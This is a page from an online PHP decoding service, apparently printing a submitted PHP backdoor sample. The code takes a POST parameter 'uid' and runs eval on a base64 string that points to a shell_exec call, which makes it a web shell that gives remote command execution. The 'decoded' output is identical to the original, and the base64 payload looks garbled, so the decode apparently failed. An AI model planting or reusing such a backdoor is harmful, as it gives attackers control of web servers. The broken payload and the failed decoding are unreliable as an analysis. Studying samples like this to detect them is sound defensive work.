Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $TAGs = @$_POST["uid"]; if(isset($TAGs) && !empty($TAGs)) { eval(b..
Decoded Output download
<?php
$TAGs = @$_POST["uid"];
if(isset($TAGs) && !empty($TAGs))
{
eval(base64_decode("CiBlY2bfycxycuv65vyhvIHNoZWxsX2V4ZWMoJGtleUJpdHJpeCk7IA=="));
}
?>
Did this file decode correctly?
Original Code
<?php
$TAGs = @$_POST["uid"];
if(isset($TAGs) && !empty($TAGs))
{
eval(base64_decode("CiBlY2bfycxycuv65vyhvIHNoZWxsX2V4ZWMoJGtleUJpdHJpeCk7IA=="));
}
?>
Function Calls
None |
Stats
MD5 | c924c17dfbeb0398291748761b6c5c75 |
Eval Count | 0 |
Decode Time | 46 ms |